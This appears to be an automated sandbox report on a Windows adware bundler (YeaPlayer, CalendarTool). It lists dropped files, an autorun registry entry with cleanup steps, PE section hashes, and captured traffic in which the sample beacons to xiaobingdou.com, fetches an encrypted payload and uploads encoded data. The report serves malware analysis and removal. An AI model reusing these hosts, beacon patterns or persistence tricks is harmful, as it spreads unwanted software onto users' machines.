%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\QY4FSATI\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\11082\YeaPlayer_br_IBD_Bundle.exe (141913 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\11075\51486_a.xml (8672 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd2.tmp\cookies (188 bytes)
%Documents and Settings%\%current user%\Application Data\YeaPlayer_br_IBD_Bundle.exe (4185 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\btn_today_pressed.png (172 bytes)
%Program Files%\CalendarTool\2.0.0.11189\DefaultConfig\Festival.json (1 bytes)
%Program Files%\CalendarTool\2.0.0.11189\Config7\Language.json (1 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\icn_heart_color.png (440 bytes)
%Program Files%\CalendarTool\2.0.0.11189\CalendarEntry.dll (4316 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\icn_pen_grey.png (248 bytes)
%Program Files%\CalendarTool\2.0.0.11189\CrashUL.exe (8165 bytes)
%Program Files%\CalendarTool\2.0.0.11189\Config7\Festival.json (1568 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\btn_today_hover.png (174 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\btn_scroll_pressed.png (189 bytes)
%Program Files%\CalendarTool\2.0.0.11189\Config8\Config.json (2 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\btn_left_normal.png (995 bytes)
%Program Files%\CalendarTool\2.0.0.11189\InstallHelper.exe (19114 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\icn_pen_half.png (217 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\btn_switchup_normal.png (481 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\img_arrow_up.png (132 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\btn_mode_normal.png (1 bytes)
%Program Files%\CalendarTool\2.0.0.11189\Config-3\Festival.json (16 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\btn_scroll_hover.png (179 bytes)
%Program Files%\CalendarTool\2.0.0.11189\Report.exe (5902 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\btn_checkbox_unselect.png (1 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\btn_radio_selected.png (1 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\main_bg_frame.png (1260 bytes)
%Program Files%\CalendarTool\2.0.0.11189\calendar.exe (47962 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\btn_left_pressed.png (1 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\bg_classsic.png (3 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\btn_switchup_pressed.png (1 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\btn_mode_pressed.png (1 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\icn_money_half.png (443 bytes)
%Program Files%\CalendarTool\2.0.0.11189\CrashReport.exe (16453 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\btn_scroll_normal.png (179 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\btn_radio_hover.png (1 bytes)
%Program Files%\CalendarTool\2.0.0.11189\Config9\Festival.json (12 bytes)
%Program Files%\CalendarTool\2.0.0.11189\EVPKernel.dll (23698 bytes)
%Program Files%\CalendarTool\2.0.0.11189\DefaultConfig\Language.json (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd5.tmp\System.dll (11 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\btn_today_normal.png (177 bytes)
%Program Files%\CalendarTool\2.0.0.11189\Config-3\Language.json (1 bytes)
%Program Files%\CalendarTool\2.0.0.11189\CalendarServ.exe (2318 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\btn_right_normal.png (994 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\btn_switchdown_hover.png (1 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\btn_scroll_disabled.png (179 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\btn_right_hover.png (993 bytes)
%Program Files%\CalendarTool\2.0.0.11189\Config8\Language.json (1 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\btn_checkbox_selected.png (1 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\bg_aero1.png (3 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\btn_checkbox_hover.png (949 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\bg_aero.png (3 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\icn_clover_grey.png (452 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\btn_right_pressed.png (1 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\img_arrow_down.png (131 bytes)
%Program Files%\CalendarTool\2.0.0.11189\Config8\Festival.json (15 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\btn_switchdown_normal.png (519 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\btn_left_hover.png (995 bytes)
%Program Files%\CalendarTool\2.0.0.11189\Config7\Festival_special.json (6 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\bg_modern.png (2 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\icn_pen_color.png (235 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\icn_money_color.png (606 bytes)
%Program Files%\CalendarTool\2.0.0.11189\EVPConfig.ini (234 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\btn_mode_hover.png (1 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\bg_menu.png (989 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\btn_switchup_hover.png (1 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\icn_clover_half.png (348 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\icn_clover_color.png (509 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\icn_heart_grey.png (417 bytes)
%Program Files%\CalendarTool\2.0.0.11189\EVPNet.dll (11930 bytes)
%Program Files%\CalendarTool\2.0.0.11189\Config9\Config.json (2 bytes)
%Program Files%\CalendarTool\2.0.0.11189\Config9\Language.json (1 bytes)
%Program Files%\CalendarTool\2.0.0.11189\EVPHelp.dll (10720 bytes)
%Program Files%\CalendarTool\2.0.0.11189\CrashReportModuleConf.ini (673 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\btn_checkbox_normal.png (955 bytes)
%Program Files%\CalendarTool\2.0.0.11189\EVPDR.dll (10408 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\skin.xml (1568 bytes)
%Program Files%\CalendarTool\2.0.0.11189\Config7\Config.json (2 bytes)
%Program Files%\CalendarTool\2.0.0.11189\Config-3\Config.json (3 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\btn_radio_normal.png (1 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\scroll.bmp (1568 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\btn_switchdown_pressed.png (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst6.tmp.exe (19114 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\icn_heart_half.png (307 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\main_bg_bottom.png (8 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\bg_main.png (1 bytes)
%Program Files%\CalendarTool\2.0.0.11189\EVPTask.dll (13763 bytes)
%Program Files%\CalendarTool\2.0.0.11189\DefaultConfig\Config.json (2 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\icn_money_grey.png (576 bytes)
- Delete the following value(s) in the autorun key (How to Work with System Registry):
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"YeaInstaller" = "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsd2.tmp\setup.exe"
- Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
- Reboot the computer.
Static Analysis
VersionInfo
No information is available.
PE Sections
Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
---|---|---|---|---|---|
.text | 4096 | 24124 | 24576 | 4.45853 | 1a13b408c917b27c9106545148d3b8d3 |
.rdata | 28672 | 4714 | 5120 | 3.46982 | 921acf8cb0aea87c0603fa899765fcc2 |
.data | 36864 | 154936 | 1536 | 2.97482 | 797517c6ef57aa95d53df2cf07568953 |
.ndata | 192512 | 32768 | 0 | 0 | d41d8cd98f00b204e9800998ecf8427e |
.rsrc | 225280 | 48696 | 49152 | 4.32483 | 23edce385f432ed492f596e7da74f1f9 |
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
Network Activity
URLs
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
Traffic
POST /online.aspx?Nzc5QzYxN0M3QTlCNzZEMkM2NDlCQjI1MUQzNzMyRDNGNEZFRUI2MDhGNzRFNjdCODFERTEzNUZDQUQ1Q0FGMUY5RjM1RkI3NDg3MjVBQkJGOURFRjY1OTE3NTJFQzlEOEE1NkQ4QTVCOUNGNzUxQ0IwRkJDRjlERTMwNDgxMTY= HTTP/1.1
Content-Length: 0
Connection: Close
User-Agent: User-Agent:Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
Host: xiaobingdou.com
HTTP/1.1 500 Internal Server Error
Connection: close
Date: Tue, 03 May 2016 01:55:56 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 3030
<html>.. <head>.. <title>Runtime Error</title>.. <style>.. body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;} .. p {font-family:"Verdana";font-weight:normal;color:black;margin-top: -5px}.. b {font-family:"Verdana";font-weight:bold;color:black;margin-top: -5px}.. H1 { font-family:"Verdana";font-weight:normal;font-size:18pt;color:red }.. H2 { font-family:"Verdana";font-weight:normal;font-size:14pt;color:maroon }.. pre {font-family:"Lucida Console";font-size: .9em}.. .marker {font-weight: bold; color: black;text-decoration: none;}.. .version {color: gray;}.. .error {margin-bottom: 10px;}.. .expandable { text-decoration:underline; font-weight:bold; color:navy; cursor:hand; }.. </style>.. </head>.. <body bgcolor="white">.. <span><H1>Server Error in '/' Application.<hr width=100% size=1 color=silver></H1>.. <h2> <i>Runtime Error</i> </h2></span>.. <font face="Arial, Helvetica, Geneva, SunSans-Regular, sans-serif ">.. <b> Description: </b>An application error occurred on the server. The current custom error settings for this application prevent the details of the application error from being viewed remotely (for security reasons). It could, however, be viewed by browsers running on the local server machine... <
<<< skipped >>>
GET /yeaplayer_br.encrypt HTTP/1.1
User-Agent: HTTP_CLIENT
Host: download.thedesktopweather.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Tue, 03 May 2016 01:56:00 GMT
Server: PWS/8.1.36
X-Px: ms h0-s1157.v0-mow ( h0-s1063.v0-mow), ms h0-s1063.v0-mow ( h0-s75.p51-icn), ht-d h0-s75.p51-icn.cdngp.net
ETag: "769c03b-f6-529cfae03b180"
Cache-Control: max-age=604800
Expires: Thu, 05 May 2016 20:26:06 GMT
Age: 365394
Content-Length: 246
Content-Type: text/plain
Last-Modified: Thu, 21 Jan 2016 03:27:18 GMT
Connection: keep-alive
POST /jihuo.aspx?Nzc5QzYxN0M3QTlCNzZEMkM2NDlCQjI1MUQzNzMyRDNGQzc4RjI1RDExOEU4MTVCNERBQzVDRjM5MEMzMjlCMDM3RTBERTg3QjA3NTQ2ODMyRTQ1NjUyQjkxQzNFQkUyNDJEQTgyMjJCMDJFNzk5Q0Y5MkI2MTE0MTMwNjhBRDBDQkE5RDRGQ0ExMUNFOTc5RUNGRkYwRkE1NUU3QzU2N0ZCOTc0QzA5MjgwNzkzQ0FBMDBFNjk2OUI3NTdBMUFF HTTP/1.1
Content-Length: 0
Connection: Close
User-Agent: User-Agent:Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
Host: xiaobingdou.com
HTTP/1.1 200 OK
Connection: close
Date: Tue, 03 May 2016 01:55:58 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Cache-Control: private
Content-Length: 0
POST /online.aspx?Nzc5QzYxN0M3QTlCNzZEMkM2NDlCQjI1MUQzNzMyRDNGNEZFRUI2MDhGNzRFNjdCODFERTEzNUZDQUQ1Q0FGMUY5RjM1RkI3NDg3MjVBQkJGOURFRjY1OTE3NTJFQzlEOEE1NkQ4QTVCOUNGNzUxQ0IwRkJDRjlERTMwNDgxMTY= HTTP/1.1
Content-Length: 0
Connection: Close
User-Agent: User-Agent:Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
Host: xiaobingdou.com
HTTP/1.1 500 Internal Server Error
Connection: close
Date: Tue, 03 May 2016 01:55:55 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 3030
<html>.. <head>.. <title>Runtime Error</title>.. <style>.. body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;} .. p {font-family:"Verdana";font-weight:normal;color:black;margin-top: -5px}.. b {font-family:"Verdana";font-weight:bold;color:black;margin-top: -5px}.. H1 { font-family:"Verdana";font-weight:normal;font-size:18pt;color:red }.. H2 { font-family:"Verdana";font-weight:normal;font-size:14pt;color:maroon }.. pre {font-family:"Lucida Console";font-size: .9em}.. .marker {font-weight: bold; color: black;text-decoration: none;}.. .version {color: gray;}.. .error {margin-bottom: 10px;}.. .expandable { text-decoration:underline; font-weight:bold; color:navy; cursor:hand; }.. </style>.. </head>.. <body bgcolor="white">.. <span><H1>Server Error in '/' Application.<hr width=100% size=1 color=silver></H1>.. <h2> <i>Runtime Error</i> </h2></span>.. <font face="Arial, Helvetica, Geneva, SunSans-Regular, sans-serif ">.. <b> Description: </b>An application error occurred on the server. The current custom error settings for this application prevent the details of the application error from being viewed remotely (for security reasons). It could, however, be viewed by browsers running on the local server machine... <
<<< skipped >>>
POST /jihuo.aspx?Nzc5QzYxN0M3QTlCNzZEMkM2NDlCQjI1MUQzNzMyRDNGNEZFRUI2MDhGNzRFNjdCODFERTEzNUZDQUQ1Q0FGMUVBQkJBMzMzMzEwNjZEMjZGQzNDMkMwREI0MTIwQ0ZGNDlERjNDNUIyNjgwNjZGRDczQzBCMjQzQjg2RTMzNUIxMkYwQzU4NzY3NzQxQTNDNjc3MEM4M0JFRjlEMkZCNUEyRDA1RTU0OThBQ0Q2QTg2NjlDRTkyMDEyMjkwNzg5 HTTP/1.1
Content-Length: 0
Connection: Close
User-Agent: User-Agent:Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
Host: xiaobingdou.com
HTTP/1.1 200 OK
Connection: close
Date: Tue, 03 May 2016 01:55:51 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Cache-Control: private
Content-Length: 0
POST /online.aspx?Nzc5QzYxN0M3QTlCNzZEMkM2NDlCQjI1MUQzNzMyRDNGNEZFRUI2MDhGNzRFNjdCODFERTEzNUZDQUQ1Q0FGMUY5RjM1RkI3NDg3MjVBQkJGOURFRjY1OTE3NTJFQzlEOEE1NkQ4QTVCOUNGNzUxQ0IwRkJDRjlERTMwNDgxMTY= HTTP/1.1
Content-Length: 0
Connection: Close
User-Agent: User-Agent:Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
Host: xiaobingdou.com
HTTP/1.1 500 Internal Server Error
Connection: close
Date: Tue, 03 May 2016 01:55:51 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 3030
<html>.. <head>.. <title>Runtime Error</title>.. <style>.. body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;} .. p {font-family:"Verdana";font-weight:normal;color:black;margin-top: -5px}.. b {font-family:"Verdana";font-weight:bold;color:black;margin-top: -5px}.. H1 { font-family:"Verdana";font-weight:normal;font-size:18pt;color:red }.. H2 { font-family:"Verdana";font-weight:normal;font-size:14pt;color:maroon }.. pre {font-family:"Lucida Console";font-size: .9em}.. .marker {font-weight: bold; color: black;text-decoration: none;}.. .version {color: gray;}.. .error {margin-bottom: 10px;}.. .expandable { text-decoration:underline; font-weight:bold; color:navy; cursor:hand; }.. </style>.. </head>.. <body bgcolor="white">.. <span><H1>Server Error in '/' Application.<hr width=100% size=1 color=silver></H1>.. <h2> <i>Runtime Error</i> </h2></span>.. <font face="Arial, Helvetica, Geneva, SunSans-Regular, sans-serif ">.. <b> Description: </b>An application error occurred on the server. The current custom error settings for this application prevent the details of the application error from being viewed remotely (for security reasons). It could, however, be viewed by browsers running on the local server machine... <
<<< skipped >>>
POST /fail.aspx?Nzc5QzYxN0M3QTlCNzZEMkM2NDlCQjI1MUQzNzMyRDNGNEZFRUI2MDhGNzRFNjdCODFERTEzNUZDQUQ1Q0FGMUIyMDBFNEQ5MkU5RjlEN0UzQjI1NTYxMzcwMzQxOTczMTdCQzQ1MjI5QjNCODhBNTgzRjExRTk3NzFBOTRCMUE= HTTP/1.1
Content-Length: 0
Connection: Close
User-Agent: User-Agent:Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
Host: xiaobingdou.com
HTTP/1.1 200 OK
Connection: close
Date: Tue, 03 May 2016 01:55:59 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Cache-Control: private
Content-Length: 0
POST /online.aspx?Nzc5QzYxN0M3QTlCNzZEMkM2NDlCQjI1MUQzNzMyRDNGNEZFRUI2MDhGNzRFNjdCODFERTEzNUZDQUQ1Q0FGMUY5RjM1RkI3NDg3MjVBQkJGOURFRjY1OTE3NTJFQzlEOEE1NkQ4QTVCOUNGNzUxQ0IwRkJDRjlERTMwNDgxMTY= HTTP/1.1
Content-Length: 0
Connection: Close
User-Agent: User-Agent:Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
Host: xiaobingdou.com
HTTP/1.1 500 Internal Server Error
Connection: close
Date: Tue, 03 May 2016 01:55:53 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 3030
<html>.. <head>.. <title>Runtime Error</title>.. <style>.. body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;} .. p {font-family:"Verdana";font-weight:normal;color:black;margin-top: -5px}.. b {font-family:"Verdana";font-weight:bold;color:black;margin-top: -5px}.. H1 { font-family:"Verdana";font-weight:normal;font-size:18pt;color:red }.. H2 { font-family:"Verdana";font-weight:normal;font-size:14pt;color:maroon }.. pre {font-family:"Lucida Console";font-size: .9em}.. .marker {font-weight: bold; color: black;text-decoration: none;}.. .version {color: gray;}.. .error {margin-bottom: 10px;}.. .expandable { text-decoration:underline; font-weight:bold; color:navy; cursor:hand; }.. </style>.. </head>.. <body bgcolor="white">.. <span><H1>Server Error in '/' Application.<hr width=100% size=1 color=silver></H1>.. <h2> <i>Runtime Error</i> </h2></span>.. <font face="Arial, Helvetica, Geneva, SunSans-Regular, sans-serif ">.. <b> Description: </b>An application error occurred on the server. The current custom error settings for this application prevent the details of the application error from being viewed remotely (for security reasons). It could, however, be viewed by browsers running on the local server machine... <
<<< skipped >>>
POST /online.aspx?Nzc5QzYxN0M3QTlCNzZEMkM2NDlCQjI1MUQzNzMyRDNGNEZFRUI2MDhGNzRFNjdCODFERTEzNUZDQUQ1Q0FGMUY5RjM1RkI3NDg3MjVBQkJGOURFRjY1OTE3NTJFQzlEOEE1NkQ4QTVCOUNGNzUxQ0IwRkJDRjlERTMwNDgxMTY= HTTP/1.1
Content-Length: 0
Connection: Close
User-Agent: User-Agent:Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
Host: xiaobingdou.com
HTTP/1.1 500 Internal Server Error
Connection: close
Date: Tue, 03 May 2016 01:55:54 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 3030
<html>.. <head>.. <title>Runtime Error</title>.. <style>.. body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;} .. p {font-family:"Verdana";font-weight:normal;color:black;margin-top: -5px}.. b {font-family:"Verdana";font-weight:bold;color:black;margin-top: -5px}.. H1 { font-family:"Verdana";font-weight:normal;font-size:18pt;color:red }.. H2 { font-family:"Verdana";font-weight:normal;font-size:14pt;color:maroon }.. pre {font-family:"Lucida Console";font-size: .9em}.. .marker {font-weight: bold; color: black;text-decoration: none;}.. .version {color: gray;}.. .error {margin-bottom: 10px;}.. .expandable { text-decoration:underline; font-weight:bold; color:navy; cursor:hand; }.. </style>.. </head>.. <body bgcolor="white">.. <span><H1>Server Error in '/' Application.<hr width=100% size=1 color=silver></H1>.. <h2> <i>Runtime Error</i> </h2></span>.. <font face="Arial, Helvetica, Geneva, SunSans-Regular, sans-serif ">.. <b> Description: </b>An application error occurred on the server. The current custom error settings for this application prevent the details of the application error from being viewed remotely (for security reasons). It could, however, be viewed by browsers running on the local server machine... <
<<< skipped >>>
POST /online.aspx?Nzc5QzYxN0M3QTlCNzZEMkM2NDlCQjI1MUQzNzMyRDNGNEZFRUI2MDhGNzRFNjdCODFERTEzNUZDQUQ1Q0FGMUY5RjM1RkI3NDg3MjVBQkJGOURFRjY1OTE3NTJFQzlEOEE1NkQ4QTVCOUNGNzUxQ0IwRkJDRjlERTMwNDgxMTY= HTTP/1.1
Content-Length: 0
Connection: Close
User-Agent: User-Agent:Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
Host: xiaobingdou.com
HTTP/1.1 500 Internal Server Error
Connection: close
Date: Tue, 03 May 2016 01:55:52 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 3030
<html>.. <head>.. <title>Runtime Error</title>.. <style>.. body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;} .. p {font-family:"Verdana";font-weight:normal;color:black;margin-top: -5px}.. b {font-family:"Verdana";font-weight:bold;color:black;margin-top: -5px}.. H1 { font-family:"Verdana";font-weight:normal;font-size:18pt;color:red }.. H2 { font-family:"Verdana";font-weight:normal;font-size:14pt;color:maroon }.. pre {font-family:"Lucida Console";font-size: .9em}.. .marker {font-weight: bold; color: black;text-decoration: none;}.. .version {color: gray;}.. .error {margin-bottom: 10px;}.. .expandable { text-decoration:underline; font-weight:bold; color:navy; cursor:hand; }.. </style>.. </head>.. <body bgcolor="white">.. <span><H1>Server Error in '/' Application.<hr width=100% size=1 color=silver></H1>.. <h2> <i>Runtime Error</i> </h2></span>.. <font face="Arial, Helvetica, Geneva, SunSans-Regular, sans-serif ">.. <b> Description: </b>An application error occurred on the server. The current custom error settings for this application prevent the details of the application error from being viewed remotely (for security reasons). It could, however, be viewed by browsers running on the local server machine... <
<<< skipped >>>
POST /cgi-bin-py/weather_install.cgi HTTP/1.1
Content-Type: multipart/form-data; boundary=6F9B7B0CEF0C4cfbA767D8D91B5F4982
User-Agent: HTTP_CLIENT
Host: VVV.thedesktopweather.com
Content-Length: 430
Connection: Keep-Alive
--6F9B7B0CEF0C4cfbA767D8D91B5F4982
Content-Disposition: form-data; name="ufile01"; filename="boundary"
Content-Type: application/octet-stream
/x..g^t..rn..a@.lj..>./..)<.Bq..mb.YoJ~..#=.DuT.v*..n^tP.~y.T,...5..y^bP.rd..aC.ex.Hy.=P.9r..aZ. 4.P(% ..wk.E
.&&.(N....f..oT.1(.P(M`B. $..aZ.8;.H0^.B.((.a..5...(F5P.zx.N78.9?.P(. ..k$.X&T.v(..x.lH. (..7..1x.Hg. ..h~.R7).1=..(.3=1E38566
--6F9B7B0CEF0C4cfbA767D8D91B5F4982--
HTTP/1.1 200 OK
Content-Type: text/plain
Date: Tue, 03 May 2016 01:56:00 GMT
Server: Apache
Content-Length: 7
Connection: keep-alive
success....
POST /cgi-bin-py/weather_install.cgi HTTP/1.1
Content-Type: multipart/form-data; boundary=C5252C36FEFA4de894DB8DCC11B86612
User-Agent: HTTP_CLIENT
Host: VVV.thedesktopweather.com
Content-Length: 425
Connection: Keep-Alive
--C5252C36FEFA4de894DB8DCC11B86612
Content-Disposition: form-data; name="ufile01"; filename="boundary"
Content-Type: application/octet-stream
/x..g^t..rn..a@.lj..>./..)<.Bq..mb.YoJ~..#=.DuT.v*..n^tP.~y.T,...5..y^bP.rd..aC.ex.Hy.=P.9r..aZ. 4.P(% ..wk.E
.&&.(N....f..oT.1(.P(M`B. $..aZ.8;.H0^.B.((.a..5...(F5P.zx.N78.9?.P(. ..k$.X&T.v(..x.lH. (..7..1x.Hg. ..h~.R7D.)'=1E38566
--C5252C36FEFA4de894DB8DCC11B86612--
HTTP/1.1 200 OK
Content-Type: text/plain
Date: Tue, 03 May 2016 01:56:00 GMT
Server: Apache
Content-Length: 7
Connection: keep-alive
successHTTP/1.1 200 OK..Content-Type: text/plain..Date: Tue, 03 May 2016 01:56:00 GMT..Server: Apache..Content-Length: 7..Connection: keep-alive..success....
POST /cgi-bin-py/weather_install.cgi HTTP/1.1
Content-Type: multipart/form-data; boundary=2F3412807F844ce0BD3A3602E56090DD
User-Agent: HTTP_CLIENT
Host: VVV.thedesktopweather.com
Content-Length: 474
Connection: Keep-Alive
--2F3412807F844ce0BD3A3602E56090DD
Content-Disposition: form-data; name="ufile01"; filename="boundary"
Content-Type: application/octet-stream
/x..g^t..rn..a@.lj..>./..)<.Bq..mb.YoJ~..#=.DuT.v*..n^tP.~y.T,...5..y^bP.rd..aC.ex.Hy.=P.9r..aZ. 4.P(% ..wk.E
.&&.(N....f..oT.1(.P(M`B. $..aZ.8;.H0^.B.((.a..5...(F5P.t}.L,...)..e.*..!(..oT.;-..e.*-.rg.SaL.dx.Hz.<..oD.M&T.v)...`..~(..1...P(Ll^.os.EaL.05..f./..}c.I0..v'.=1E38566
--2F3412807F844ce0BD3A3602E56090DD--
HTTP/1.1 200 OK
Content-Type: text/plain
Date: Tue, 03 May 2016 01:56:03 GMT
Server: Apache
Content-Length: 7
Connection: keep-alive
successHTTP/1.1 200 OK..Content-Type: text/plain..Date: Tue, 03 May 2016 01:56:03 GMT..Server: Apache..Content-Length: 7..Connection: keep-alive..success..
POST /begin.aspx?Nzc5QzYxN0M3QTlCNzZEMkM2NDlCQjI1MUQzNzMyRDNGNEZFRUI2MDhGNzRFNjdCODFERTEzNUZDQUQ1Q0FGMUIyMDBFNEQ5MkU5RjlEN0UzQjI1NTYxMzcwMzQxOTczRjUxNUI4REIxM0Q4OUQ2MEIzMUM2RTQ4NDU4MkI2MjREOTVFRjI5QTQ0NTg0OUYwNjgyRkVFQjdFMkU4OTNFMg== HTTP/1.1
Content-Length: 0
Connection: Close
User-Agent: User-Agent:Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
Host: xiaobingdou.com
HTTP/1.1 200 OK
Connection: close
Date: Tue, 03 May 2016 01:55:54 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Cache-Control: private
Content-Length: 0
GET /Setup/51486_a.xml HTTP/1.0
User-Agent: User-Agent:Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
Host: wsxc123.cc
Accept: */*
Connection: Keep-Alive
HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Tue, 19 Apr 2016 09:49:48 GMT
Accept-Ranges: bytes
ETag: "0466bcf209ad11:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Tue, 03 May 2016 01:55:49 GMT
Connection: keep-alive
Content-Length: 35506
#ws.........................................................................)pu)Kv$qc(wz*Bd$A\ f[)Co)wz$sS*[z%[x#p@)AY(qA*cg k^.......................)us)]F)wz$sS f[)Co%wT$bh aE)rI VH*[z%[x#p@)AY(qA*cg k^...........*E_)pL$bm$xu q])QL..............#pV(tG$qq%_r*Bi............#pV)jN*RP%PL$jM(tG$qq VH*ZK(wz*Tc%LV$sK Nu)Kw............(ta VH(tL(tf%_r*Bi(tG$qq#p@*ah)hH*{w)Fl.... VH.....)\A........$sW dG)\A.......#pV$qc(wz)bE$oI)\A#pD dG)vC)^@)FS$Oq(ta*Tr hv VH)\A#pE................)bE$oI*dm)pC....#pV....)@I.........$Kf)bV(uE)bE$oI%LV$sK Nu)Kw...)IO xl#p@(pV)DW)wv*Z| VH$sW dG$sW$m@)bE$oI#p@)bE$oI*[z(tA*lu*Ab*Z|)DW)wv VH$sW dG)Ci*SH#p@$L@*Tc%LV$sK f[)Co)\A*Er)D| Wb*lK f[)Co....#pV$Kf)bV(uE)bE$oI%LV$sK Nu)Kw...)IO xl#p@(tB.(tA)\@ VH*Tc(tA(pV)DW)wv*Z| VH$sW dG)bE$oI#p@%LV$sK........)DW)wv VH$sW dG)Ci*SH*Er)D| Wb*lK f[)Co......$Kf)bV(uE)bE$oI#p@%LV$sK Nu)Kw 